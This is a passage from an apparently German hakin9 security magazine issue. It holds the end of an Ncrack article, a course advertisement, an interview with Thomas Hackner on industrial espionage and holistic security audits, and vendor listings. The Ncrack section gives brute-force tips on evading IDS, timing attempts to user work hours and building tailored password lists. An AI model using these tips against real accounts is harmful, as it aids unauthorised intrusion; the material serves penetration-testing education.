Firewalls oder Ids-Systeme im Netzwerk vorhanden sind. Solle die Konfiguration und Durchführung von Ncrack mit bedacht durchgeführt werden. Denn schnell erkennen diese Systeme zu viele Authentifizierungsver-suche von einem Client an einem Dienst als einen DoS-Angriff. Auf der anderen Seite, führt dies jedoch auch zu erheblichen Performanceverlusten, da nur noch wenige Verbindungen mit hohen Timeouts durchgeführt werden können.
Es sollten auch im Normalfall nicht ganze Netzwerk-bereiche angegeben werden, da der zu prüfende Raum zu groß wird. Ziele sollten ganz gezielt ausgesucht wer-den, da so eine zeitliche Prüfung möglich ist. Es sollte auch auf z.B. Arbeitszeiten der User geachtet werden, versuchen Sie Zeiten zu finden in denen die User arbei-ten und Fehler in den Anmeldungen zur Tagesgeschäft zählen.
Erstellen Sie sich persönliche Namens- und Pass-wortlisten. Erstellen Sie Namenslisten anhand von Informationen die Sie Sammeln konnten. Die Pass-wortlisten sollten zusammengestellt werden aus den Namenslisten und Informationen aus dem Internet. Es gibt genug Quellen die über bewertete Passwortlis-ten verfügen, „the common ones“, bzw. aktuelle Listen über Standardpasswörter von Netzwerkgeräten verfü-gen.
CHRISTIAN STOCKHORSTDer Autor beschäftigt sich privat und auch beruflich mit To-ols der IT – Sicherheit, vor allem Programme die zur Durchfüh-rung von Penetrationsvorgängen genutzt werden können ste-hen ganz in seinem Blickpunkt. Er arbeitet momentan im Be-reich Netzwerktechnik, IT - Sicherheit und Client-/Serverso-ftware bei der KDT GmbH. Kontakt mit dem Autor: [email protected]
Vorteile:• Kombination mit Nmap XML Output• Zielspezifikation über Inputfiles, für große Netzwerke• Projekt der Nmap-Community• Optionen ähnlich wie Nmap• Modulareransatz für jede Option/Service• Open Source Programm, Quellcode,
Nachteile:• Es gibt nur eine beschränkte Modulauswahl für Netzwerk-
dienste• Es gibt lediglich eine frühe Alpha-Version, daher sind Mo-
dule gar nicht oder nur unzureichend getestet
Im Internet• http://nmap.org/• http://nmap.org/ncrack/• http://sock-raw.org/papers/openssh_library• http://seclists.org/nmap-dev/2010/q4/173
Was erwartet Sie in diesem Kurs:Die Wiederherstellung verlorener Passwörter Das Abfangen von Informationen in lokalen Netzwerken Das Abfangen von verschlüsselten Daten Angriff auf eine SSL-Sitzung Backdoor - die "Hintertür" als Tor zum System Dateien und Verzeichnisse mit Hilfe des Kernels 2.6 verstecken AngriAngriffe vom Typ Buffer-Overflow Angriffe vom Typ Heap-Overflow Format-String-Angriffe Das Überschreiben des Datenstrom-Zeigers (File Stream Pointer Overwrite) Fehler im Systemkernel Die Verwendung des ICMP-Protokolls aus der Sicht des Hackers Identifizierung eines Netzwerkcomputers Netfilter im Dienste der SystemsicheNetfilter im Dienste der Systemsicherheit Absichern des Betriebssystems Schritt für Schritt Sicherheitsscanner Kernelpatches zur Erhöhung der Sicherheit Intrusion Detection System (IDS) Angriff mit Hilfe eines Webservers Shellcode-Erstellung in der Win32-Umgebung
72888
1/201144
INTERVIEW
hakin9: Hallo Herr Hackner, es freut mich, dass Sie noch einmal Zeit gefunden haben, um sich über das Thema Industrie- und Wirtschaftsspionage mit uns zu unterhalten. Gerade in Zeiten der Wirtschaftskrise und verstärkten Konkurrenzdruck, den wir in einigen Wirtschaftsbereichen deutlich erkennen können, steigt das Risiko Opfer eines solchen Angriffes zu werden. Wie sehen Sie die Entwicklung in diesem Bereich?Thomas Hackner: Es freut mich ebenfalls, mit Ihnen noch einmal ins Gespräch zu kommen. Die Situation in Österreich ist speziell. Wir stellen durch unsere geopoli-tisch zentrale Lage einen interessanten Knotenpunkt für viele Nachrichtendienste dar. Die Anzahl an diplomati-schen Vertretungen und Nachrichtendienstoffizieren in-ternationaler Organisationen ist überproportional hoch, so geht es aus dem Verfassungsschutzbericht 2010 des Bundesministeriums für Inneres hervor. Interessanter-weise gab es keine nachvollziehbaren Auswirkungen der Wirtschaftskrise auf die Anzahl der Spionagefälle in Österreich. Dennoch gilt es wachsam zu sein, die Dun-kelziffer an Vorfällen der Industriespionage dürfte ent-sprechend hoch sein und sowohl kleine, als auch große Firmen betreffen. Das Risiko durch Wirtschaftsspiona-ge ist durch den regen Verkehr an Nachrichtendiensten ebenfalls nicht zu unterschätzen.
hakin9: Sie sprechen von einer Dunkelziffer, gibt es denn Zahlen, denen man Glauben schenken kann?Thomas Hackner: Leider gibt es keine offiziellen Zahlen, die den wahrscheinlich durchgeführten Angriffen auch nur Nahe kommen. Zum einen liegt es in der Natur der Sa-che, dass derartige Angriffe nicht erkannt werden sollen und zum anderen werden identifizierte Vorfälle nur selten gemeldet. Allerdings wurde 2010 eine Studie über die Be-troffenheit der österreichischen Unternehmen durch Wirt-schafts- und Industriespionage veröffentlicht. Durchgeführt wurde diese vom FH Campus Wien in Zusammenarbeit mit dem Bundesamt für Verfassungsschutz und Terroris-musbekämpfung des BMI. Aus dieser Studie geht inte- ressanterweise hervor, dass 31 % der befragten Unter-nehmen bereits Opfer eines derartigen Angriffes wurden.
Die Schadenssummen reichen dabei von unter 20.000 Euro bis hin zu über 1,5 Millionen Euro. Hochgerechnet würde dies einen jährlichen Schaden von zirka 880 Millio-nen Euro allein Österreich bedeuten. Die Dunkelziffer wird auch hier wesentlich höher geschätzt.
hakin9: Was sind die Hauptursachen für erfolgreiche Angriffe? Wo sehen Sie noch Nachholbedarf für Unternehmen?Thomas Hackner: Wie aus Berichten hervorgeht, lässt sich zirka die Hälfte aller Fälle auf Informationsabfluss durch Mitarbeiter, entweder jene, die das Unternehmen verlassen, aber auch Aktive, zurückführen. Ein nicht unbeträchtliches Risiko stellen zudem Kooperations-partner und der Informationsaustausch mit diesen dar. Richtet man sich nach diesen Punkten, so fehlt es hier an Überprüfungen der Mitarbeiter bereits beim Einstel-lungsgespräch, internen Sicherheitsmaßnahmen und -richtlinien, welche den Informationsfluss im Unterneh-men und nach Außen regeln, und am Bewusstsein der Unternehmen und dessen Mitarbeitern.
„Zu aller erst sollte man sich seiner Situation, seiner schutzwürdigen Interessen und seiner Risiken bewusst sein.“Interview mit Thomas Hackner
Interview mit Thomas Hackner
hakin9.org/de 45
nen, Know-How, Kundenlisten, aber auch bestimmte Pro-duktionsmaschinen sein. Anschließend wird versucht die Gefährdungslage zu klären und darauf aufbauend, die passendste Vorgehensweise für die folgende Sicherheits-überprüfung zu wählen. Es kann sein, dass es vernünftiger ist, verschiedene Phasen zu definieren, in denen schrittwei-se und unabhängig voneinander Überprüfungen der IT-Si-cherheit, physische Tests und Social Engineering Angriffe durchgeführt werden. Wichtig wäre dabei, dass ein Koor-dinator hinter diesen Tests steht, der die Ergebnisse der einzelnen Phasen im Ganzen versteht und in ein Gesamt-konzept vereinen kann. Wird dies im Zuge eines Projek-tes mit einem Anbieter ganzheitlicher Sicherheitsüberprü-fungen durchgeführt, ist dies ohnehin der Fall. Wurden die einzelnen Bereiche nach ihrer Überprüfung abgesichert, so können diese in einem Abschlusstest auf ihre letzte Probe gestellt werden. Auch für diesen Test muss detailliert festge-legt werden, welche Assets Ziel des Angriffes sind – ist es beispielsweise das Entwenden eines Dokuments, der Ein-bruch in ein Computersystem oder der Beweis in den Ser-verraum zu gelangen. Dies wird in einer Sitzung mit dem Geschäftsführer festgelegt, sodass niemand im operativen Betrieb von der bevorstehenden Überprüfung weiß. Zudem werden Techniken und Handlungsspielraum der Tester defi-niert. Sind alle Formalitäten geklärt, erfolgt die abschließen-de Überprüfung, die das Unternehmen einer quasi realen Attacke durch versierte Angreifer aussetzt. Dabei sind die Tester dazu angehalten alle ihre Kenntnisse und Tools ein-zusetzen und die implementierten Sicherheitsmaßnahmen in allen drei vorher genannten Bereichen auf ihre Wirksam-keit im Anlassfall zu testen. Dieses Audit nennt sich auch Ti-ger Team Assessment und ist die einzige Möglichkeit, mehr über die effektive Sicherheit des Unternehmens im Ernst-fall zu erfahren und noch vorhandene Schwachstellen im Gesamtkonzept zu erkennen. Dieses Assessment wird je-doch nicht nur am Ende eines eben beschriebenen Projek-tes mit mehreren Phasen durchgeführt, sondern kann auch zur ersten schnellen Erhebung der größten Schwachpunk-te in einem Unternehmen eingesetzt werden. So stellt es eine kostengünstige Möglichkeit dar, sich einen Überblick über den Ist-Stand der Umsetzung der gesamten Sicher-heitsstrategie zu verschaffen und Mängel bereits frühzeitig zu identifizieren.
hakin9: Die Durchführung von IT-Penetration Tests und Social Engineering Audits wird in Europa bereits von einigen Firmen angeboten. Sie führen neben diesen beiden Überprüfungen jedoch auch physische Sicherheitsaudits durch, und führen diese in dem von Ihnen beschriebenen ganzheitlichen Konzept zusammen. Wie sind Sie dazu gekommen und woher haben Sie Ihre Kenntnisse?Thomas Hackner: Es liegt bereits einige Jahre zurück, dass ich begonnen habe mich mit der zerstörungsfrei-en Öffnung von Schließzylindern zu beschäftigen. Ich
hakin9: Wie kann nun ein Unternehmen wissen, ob es betroffen ist und welche Maßnahmen sind in solch einem Fall zu setzen?Thomas Hackner: Wir sehen leider, dass die Unterneh-mensgröße keinen Effekt auf das Risiko angegriffen zu werden hat. Jedes Unternehmen besitzt USPs, die es von seinen Konkurrenten abhebt, oder seine Marktpositi-on stärkt. Dies können spezielle Abläufe im Unternehmen, billige Herstellung, qualitativ hochwertige Produktion, aber auch gute Verträge mit Kunden und Beziehungen zu Lie-feranten sein. Die Frage, die vor allem Unternehmen zur illegalen Konkurrenzanalyse bewegt, ist – warum kaufen die Kunden bei meiner Konkurrenz und wie kann ich sie überzeugen bei mir zu kaufen?. Und dies macht jedes er-folgreiche Unternehmen zum möglichen Ziel.
Jedes Unternehmen sollte sich bewusst machen, was seine Kernkompetenzen sind und worin es sich von sei-nen Mitbewerbern unterscheidet. Dies werden mit hoher Wahrscheinlichkeit auch jene Bereiche sein, die es ver-stärkt zu schützen gilt. Geschützt werden können diese nur durch ein Sicherheitskonzept, das sowohl IT, Personal und Geschäftslokalitäten vereint. Es ist wichtig alle diese Aspekte in die eigene Sicherheitsstrategie zu integrieren. Wird ein Bereich außen vor gelassen, so wird mit hoher Wahrscheinlichkeit gerade dieser von potentiellen Angrei-fern zur Durchführung ihres Planes ausgewählt werden. Investitionen zur Absicherung in den beiden anderen Be-reichen konnten dann nur teilweise ihre Wirkung zeigen und den Angriff leider nicht verhindern. Doch sollte man sich nicht entmutigen lassen, man kann sich diesem Ziel Schritt für Schritt nähern und mit dem richtigen Einsatz an Mitteln oft bereits durch relativ kostengünstige Maßnah-men die Sicherheit für das eigene Unternehmen erhöhen.
hakin9: Angenommen ein Unternehmer würde nun auf Sie zukommen und um Hilfe bitten, was wären die ersten Schritte, die sie dem Unternehmer raten würden?Thomas Hackner: Zu aller erst sollte man sich seiner Situation, seiner schutzwürdigen Interessen und seiner Risiken bewusst sein. Für Risikoanalysen möchte ich an dieser Stelle auf bewährte Vorgehensweisen, wie beispielsweise ISO 27005 oder NIST SP 800-30, ver-weisen. Für die Ermittlung des Ist-Standes der Sicher-heit im Unternehmen und der Wirksamkeit der bisher eingesetzten Mittel, möchte ich zur Durchführung eines ganzheitlichen Sicherheitsaudits raten. In diesen wer-den sowohl physische und personelle, als auch die IT-Sicherheitsmaßnahmen auf ihre Effektivität und ihr Vor-handensein hin überprüft.
hakin9: Wie läuft ein ganzheitliches Sicherheitsaudit ab?Thomas Hackner: In einem initialen Workshop werden mit dem Kunden gemeinsam die wertvollsten Assets in seinem Unternehmen erarbeitet. Dies können Informatio-
1/201146
INTERVIEW
kaufte damals mein erstes Pickset und ein Schloss im Baumark und verbrachte eine knappe Stunde damit, es zu öffnen. Damals hatte ich noch nicht das Gespür und das Verständnis für die Vorgänge während des Pickens, doch wenn nach einer Stunde, in der man mit dem Pick-werkzeug im Dunkeln tastet, das Schloss plötzlich öffnet, erlebt man einen sehr zufriedenstellenden Augenblick. Die darauf folgenden Öffnungsversuche gingen dann mit 10 und 5 Minuten bereits um Einiges schneller. Heute benötige ich für das gleiche Schloss 1 bis 3 Sekunden. Diese Öffnung damals war genug Motivation, mich mit der Thematik näher zu beschäftigen und so gründete ich den österreichischen Lockpicking-Verein OpenLocks.at, den wir seit August mit einer Gruppe engangierter Picker als offiziellen Sportverein führen. Durch Kontakte im Be-reich der Schloss- und Tresoröffnung, den Besuch von Weiterbildungsseminaren und vor allem laufende prak-tische Trainings erweiterte sich mein Wissensgebiet von der zerstörungsfreien Schlossöffnung zur physischen Absicherung von Unternehmen. Meine Ausbildung und praktische Erfahrung davor war hauptsächlich auf IT-Sicherheit, die Durchführung von IT Penetration Tests und IT Security Management Systemen ausgerichtet. Es war naheliegend, dass man mit IT Penetration Tests nur einen Teilaspekt der Unternehmens- und Informati-onssicherheit abdeckt. Physische Sicherheit ist bereits in wichtigen IT-Security Management Standards, wie ISO 27001 oder NIST SP 800-30, ein Thema, wird aber aus IT-Sicht etwas vernachlässigt. IT-Sicherheitsbeauftragte sind im Bereich der physischen Sicherheit oft nicht ge-schult, ein direkter Verantwortlicher für physische Sicher-heit fehlt oder es besteht nur eingeschränkt Kommunika-tion zwischen beiden Bereichen. Mein Ziel ist es, diese Welten miteinander zu verknüpfen und einen umfassen-deren Ansatz zur Informationssicherheit zu liefern.
hakin9: Sie beteiligen sich ja nicht nur aktiv am Lockpicking-Verein OpenLocks sondern haben auch das Projekt SecurityPitfalls.org ins Leben gerufen, mit dem Ziel Bewusstsein für Sicherheit zu schaffen. Wie ist dies entstanden und kann jeder daran mitarbeiten?Thomas Hackner: (lacht) Sie haben sich im Vorfeld gut informiert. Entstanden ist dies eher durch Zufall, als ich mit meinem geschätzten Freund Aljosha Judmayer ei-nen Vortrag auf einer Konferenz über das Umgehen von physischen Sicherheitsmechanismen halten sollte. Wir machten dazu einen Streifzug durch Wien und fanden wirklich viele interessant Beispiele, auch von sehr nam-haften Firmen, die zwar klar ersichtlich Sicherheitsmaß-nahmen getroffen hatten, diese aber völlig falsch um-setzten und damit neue Lücken öffneten. Wir begannen also diese Situationen zu fotografieren und zu sammeln und so entstand eine kleine Beispielgallerie an Sicher-heitslücken. Irgendwann kam ich jedoch auf die Idee, diese Sammlung im Internet zu veröffentlichen und für
Jedermann zur Verfügung zu stellen, da auf diese Weise mehr Menschen erreicht werden können. Die nun veröf-fentlichten Beiträge zeigen Fehler auf, die bei der Umset-zung von Sicherheitsmaßnahmen passieren können und sollen zum einen Sicherheitsbeauftragte auf mögliche Fehler aufmerksam machen und bei all jenen, die sich noch nicht mit der Thematik auseinander gesetzt haben, Bewusstsein schaffen. Das Projekt ist nicht auf physische Sicherheit beschränkt, wir haben auch Geschichten aus dem Social Engineering-Bereich, sowie Code-Beispiele aus der IT. Die Geschichten und Bilder sind frei verfügbar und können von jedem verwendet werden. Und vielleicht hilft es ja auch dem ein oder anderen Security Consul-tant dabei, Awareness beim Kunden zu schaffen. Mitar-beit ist nicht nur möglich, sondern auch erwünscht. Wir sind stark davon abhängig, dass uns Leser ihre Beiträge und Erlebnisse per Mail zusenden. Bilder und Beiträge werden anschließend anonymisiert und der Öffentlichkeit zum freien Gedanken- und Meinungsaustausch zur Ver-fügung gestellt.
hakin9: Was dürfen wir in Zukunft von Ihnen erwarten?Thomas Hackner: Das Jahr 2011 wird ein sehr spannen-des Jahr. Zum einen bieten wir mit HACKNER Security In-telligence erstmals ganzheitliche Sicherheitspakete für jede Unternehmensgröße an und werden Unternehmen dabei unterstützen, physische Sicherheit mit dem Thema Social Engineering und IT-Sicherheit in Einklang zu bringen. Hier erwarten uns sicher viele spannende Projekte und Sicher-heitsaudits. OpenLocks.at ist bereits in den Bundesländern Oberösterreich und Wien vertreten, wo wir monatliche Tref-fen veranstalten, bei denen jeder herzlichst eingeladen ist, vorbei zu kommen. Wir freuen uns über jeden neuen be-geisterten Lockpicker und eine erste österreichische Meis-terschaft der zerstörungsfreien Schlossöffnung wäre ein guter Schritt, den Lockpicking-Sport auch hier weiter voran zu treiben. SecurityPitfalls.org ist ein sehr Community-ori-entiertes Projekt, wir freuen uns also auch hier über jeden, der uns neue Bilder oder Stories schickt. Mit HACKNER Security Intelligence arbeiten wir eng in Forschung und Projektarbeit mit Universitäten und Forschungseinrichtun-gen zusammen und auch hier wird es im Jahr 2011 erste interessante Publikationen geben.
hakin9: Wir bedanken uns sehr herzlich für das Gespräch!Thomas Hackner: Die Freude liegt ganz auf meiner Seite.
Geführt wurde dieses Interview mit Thomas Hackner, dem Ge-schäftsführer von HACKNER Security Intelligence. Für weitere Fra-gen oder Diskussionen ist er unter der E-Mail Adresse [email protected] bzw. über die Webseite http://www.hackner-se-curity.com zu erreichen.
Datenschutz ist EU-weit gesetzliche Anforde-rung. Wir sorgen für die Erfüllung rechtlicher Vorschriften und kümmern uns um ein ange-messenes Datenschutzniveau in Ihrem Unter-nehmen, auch international.
www.blossey-partner.de
Recommended Sites
Securitymanager.de ist eine Produktion des Online-Verlag FEiG & PARTNER. Seit dem Start hat sich Securitymanager.de zu einem führenden Online-Informationsportal in Deutschland entwickelt und versteht sich als unabhängiger Informationsdienstleister der IT- und Information-Security-Branche.
www.securitymanager.de
Pericom base camp IT-Security: Unser Ziel ist es, unsere Kunden vor möglichen Gefahren für Ihre IT-Infrastruktur bestmöglich zu schüt-zen. Neben der Analyse von Risikopotentia-len durch Security Audits bieten wir, durch die Implementierung von Security-Lösungen, Schutz vor konkreten Gefahren.
www.pericom.at
Happy-Security ist ein neues Portal mit Secu-rity-Challanges, IT-Quiz, Web-Bibliothek, Multi-media-Center & vielen weiteren Features.
www.happy-security.de
CloudSafe stellt seinen Nutzern eine Plattform zur kryptographisch sicheren Ablage und Verwal-tung von sensiblen Daten zur Verfügung: Nutzer können auf CloudSafe beliebig viele Dokumente in virtuellen Safes ablegen. Es können weite-ren Personen individuelle Zugriffsrechte auf die Safes eingeräumt und somit ein sicherer Daten-austausch ermöglicht werden.
www.cloudsafe.com
AV-Comparatives geht hervor aus dem Inns-brucker Kompetenzzentrum und gilt als eines der bekanntesten unabhängigen Testhäuser für Antiviren-Software.
www.av-comparatives.org
Die Seed Forensics GmbH bietet für Strafver-folgungsbehörden professionelle Unterstützung in den Bereichen der Datensicherstellung und Datenträgerauswertung. Selbstverständlich entsprechen unsere Mitarbeiter, unser tech-nisches Equipment und auch unsere Räumli-chkeiten den notwendigen Anforderungen.
www.seed-forensics.de
Wollen Sie Ihre Seite empfehlen, kontaktieren Sie bitte: [email protected]
Die Netzwerktechnik steht auf www.easy-ne-twork.de im Mittelpunkt. Artikel, Tutorials und ein Forum bieten genügen Stoff für kommende Administratoren und Netzwerkprofis.
www.easy-network.de
Hier findest Du alles, was das Herz eines Computerfreaks höher schlagen lässt: Geek Wear mit intelligenten Sprüchen, eine riesige Auswahl Gadgets und natürlich auch viele Hacker Tools.
www.getDigital.de
Recommended Companies
SEC ConsultSEC Consult ist der führende Berater für Information Security Consulting in Zentraleuropa. Die vollständige Unab-hängigkeit von SW- und HW-Herstellern macht uns zum echten Advisor unserer Kunden. Unsere Dienstleistungen umfa- ssen externe/interne Sicherheitsaudits, (Web-) Applikationssicherheit (ONR 17- 700), Sicherheitsmanagement-Prozesse (ISO 27001) etc.
www.sec-consult.com
SEC Consult
Tele-Consulting GmbHVom BSI akkreditiertes Prüflabor für IT-Sicherheit, hakin9 und c’t Autoren, jah-relange Erfahrung bei der Durchführung von Penetrationstests und Security-Au-dits, eigener Security Scanner „tajanas”, Sicherheitskonzepte, Risikoanalysen, IT-Grundschutz-Beratung, 3 lizenzierte ISO 27001-Auditoren, VoIP-Planung und -Security
www.tele-consulting.com
B1 Systems Die B1 Systems ist international tätig in den Bereichen Linux/Open Source Consulting, Training und Support. B1 Systems spezialisiert sich in den Be-reichen Virtualisierung und Cluster.
Blossey & Partner Consulting DatenschutzbüroDatenschutz ist EU-weit gesetzliche An-forderung. Wir sorgen für die Erfüllung rechtlicher Vorschriften und kümmern uns um ein angemessenes Daten-schutzniveau in Ihrem Unternehmen, auch international. Wir erledigen alle er-forderlichen Aufgaben, die Fäden behal-ten Sie in der Hand. Nutzen Sie unser Erstberatungsgespräch.
www.blossey-partner.de
secXtreme GmbHschützt Ihre Web-Anwendungen bis auf Applikationsebene. Dazu gehört sowohl die Prüfung von Applikationen (Pentests und Code-Reviews) als auch Beratungsleistungen für Sicherheit im Entwicklungsprozess und Schutzlö-sungen (Web Application Firewalls) bei Großunternehmen und dem gehobenen Mittelstand.
www.sec-Xtreme.com
MabuntaDie mabunta GmbH agiert als hoch-spezialisierter und kompetenter Partner rund um IT-Security- und Netzwerk-Lö-sungen. Wir unterstützen bei IT-Sicher-heitsfragen in allen Unternehmens-bereichen, verbinden Wachstum mit sicherer Kommunikation. Alles in allem- mabunta „one-face-to-the-customer“, Ihr Spezialist in Fragen der IT-Sicherheit.
www.mabunta.de
Recommended Companies
SecureNet GmbH, MünchenAls Softwarehaus und Web Application Security Spezialist bieten wir Expertise rund um die Sicherheit von Webanwen-dungen: Anwendungs-Pentests, Sour-cecodeanalysen, Secure Coding Gui-delines, Beratung rund um den Software Develoment Lifecycle. Tools: Application Firewalls, Application Scanner, Fortify SCA/Defender/Tracer.
www.securenet.de
underground_8 secure computing gmbhWir entwickeln und vertreiben securi-ty appliances für die Bereiche Unified Threat Management, Traffic Shaping und Antispam. Unsere Lösungen sind hardwarebasiert und werden über Dis-tributoren, Reseller und Systemintegra-toren implementiert und vertrieben.
www.underground8.com
OPTIMAbit GmbHWir sind Spezialisten für Entwicklung und Security. Wir sichern Java, .NET und Mobile Applikationen gegen Angriffe externer und interner Art. Unsere Dien-ste umfassen Audits, Code Reviews, Penetrationstest, sowie die Erstellung von Policies. Zusätzlich bieten wir Semi-nare zu sicherheitsrelevanten Themen.
www.optimabit.com
m-privacy GmbHIT-Sicherheitslösungen – funktional und einfach zu bedienen!So präsentieren sich die von m-privacy entwickelten TightGate™-Server, z.B. TightGate™-Pro mit Datenschutz-Gü-tesiegel. Es bietet als erstes System weltweit einen kompletten Schutz vor Online-Spionage, Online-Razzien und gezielten Angriffen!
www.m-privacy.de
NESECNESEC ist Ihr Spezialist für Penetra-tionstests, Sicherheitsanalysen und IT-Security Counsulting. Das NESEC Pentest-Team unterstützt Sie bei Si-cherheitsprüfungen Ihrer Netzwerke und Webapplikationen sowie bei Sour-ce Code Audits. Bei Bedarf optimieren wir Ihre Policy, sensibilisieren Ihre Mitarbeiter und zertifizieren Ihr Unter-nehmen nach ISO 27001.
www.nesec.de
Seed Forensics GmbHDie Seed Forensics GmbH bietet für Strafverfolgungsbehörden profe-ssionelle Unterstützung in den Bereichen der Datensicherstellung und Datenträgerauswertung. Selbst-verständlich entsprechen unsere Mitarbeiter, unser technisches Equip-0ment und auch unsere Räumlichkeiten den notwendigen Anforderungen.
www.seed-forensics.de
Protea NetworksProtea ist spezialisiert auf IT-Security-Lösungen: Verschlüsselung, Firewall/VPN, Authentifizierung, Content-Filte-ring, etc. Wir bieten umfassende Bera-tung, Vertrieb von Security-Hard- und Software, Installation und umfangreiche Dienstleistungen (z. B. Konzeption, Trai-nings). Protea setzt auf Lösungen der Markt- und Technologieführer und hält dafür direkten inhouse-Support bereit.
www.proteanetworks.de
secadmsecadm ist durchtrainierter Spezialist für Airbags, ABS und Sicherheitsgurte in der IT. Zehn IT-Sicherheitsexperten mit 70 Mannjahren Erfahrung beraten, entwi-ckeln und implementieren IT-Lösungen für Kunden weltweit. Der Fokus liegt da-bei auf Themen wie Prozess-Optimierung und Security-Management. Risiko-Analy-se, die Sicherheitsberatung, Auditing, Se-curity-Leitfäden, Software-Entwicklung, Reporting bis zum Training.
www.secadm.de
Besuchen Sie die Swiss Cyber Storm 3 Security Konferenz!12. - 15. Mai 2011, Rapperswil (CH)Highlights: Cyber Underground Threats - FBI Experiences - Security Researches - Interactive Hacking Lab - OWASP Training - Forensic Investigations - Hacker Profiling - Advanced Persistent Threats - Incident Handling - iPhone Hacking - Wargame Challenges - Capture The Flag - Special Events and more!
HACKER SIND ANGRIFFSLUSTIG.
www.swisscyberstorm.com
RZ_1_inserat_A4_D_E_1.indd 1 11.10.10 13:48
